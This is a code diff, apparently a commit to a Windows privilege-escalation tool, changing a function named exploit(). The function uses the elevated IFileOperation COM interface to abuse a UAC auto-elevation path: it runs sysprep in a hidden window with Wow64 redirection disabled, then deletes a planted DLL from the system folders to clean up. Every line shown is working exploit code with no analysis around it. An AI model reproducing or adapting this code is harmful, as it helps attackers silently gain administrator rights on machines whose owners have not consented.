@@ -54,8 +54,6 @@ void exploit()
5454 wcscat_s (szElevExeFull, MAX_PATH, szElevDir);
5555 wcscat_s (szElevExeFull, MAX_PATH, sySysPrepExe);
5656
57-
58-
5957 if (CoInitialize (NULL ) == S_OK)
6058 {
6159 if (CoCreateInstance (*pIID_EIFOClass, NULL , CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, *pIID_EIFO, (void **) &pFileOp) == S_OK)
@@ -81,34 +79,30 @@ void exploit()
8179 shinfo.lpDirectory = szElevDir;
8280 shinfo.nShow = SW_HIDE;
8381
84- // Only enable redirection for the process execution.
8582 Wow64DisableWow64FsRedirection (&OldValue);
8683 if (ShellExecuteExW (&shinfo) && shinfo.hProcess != NULL )
8784 {
8885 WaitForSingleObject (shinfo.hProcess , 10000 );
8986 CloseHandle (shinfo.hProcess );
9087 }
91- Wow64RevertWow64FsRedirection (OldValue);
9288
9389 if (S_OK == SHCreateItemFromParsingName (szElevDllFull, NULL , *pIID_ShellItem2, (void **)&pSHIDelete))
9490 {
9591 if (0 != pSHIDelete)
9692 {
9793 if (S_OK == pFileOp->DeleteItem (pSHIDelete, NULL ))
9894 {
95+ pFileOp->PerformOperations ();
9996 // If we fail to delete the file probably SYSWOW64 process so use SYSNATIVE to get the correct path
10097 // DisableWOW64Redirect fails at this? Possibly due to how it interacts with UAC see:
10198 // http://msdn.microsoft.com/en-us/library/windows/desktop/aa384187(v=vs.85).aspx
102- if (!pFileOp-> PerformOperations ( ))
99+ if (S_OK == SHCreateItemFromParsingName (szElevDllFull_syswow64, NULL , *pIID_ShellItem2, ( void **)&pSHIDelete ))
103100 {
104- if (S_OK == SHCreateItemFromParsingName (szElevDllFull_syswow64, NULL , *pIID_ShellItem2, ( void **)& pSHIDelete) )
101+ if (0 != pSHIDelete)
105102 {
106- if (0 != pSHIDelete)
103+ if (S_OK == pFileOp-> DeleteItem ( pSHIDelete, NULL ) )
107104 {
108- if (S_OK == pFileOp->DeleteItem (pSHIDelete, NULL ))
109- {
110- pFileOp->PerformOperations ();
111- }
105+ pFileOp->PerformOperations ();
112106 }
113107 }
114108 }
@@ -122,4 +116,4 @@ void exploit()
122116 }
123117 }
124118 }
125- }
119+ }
0 commit comments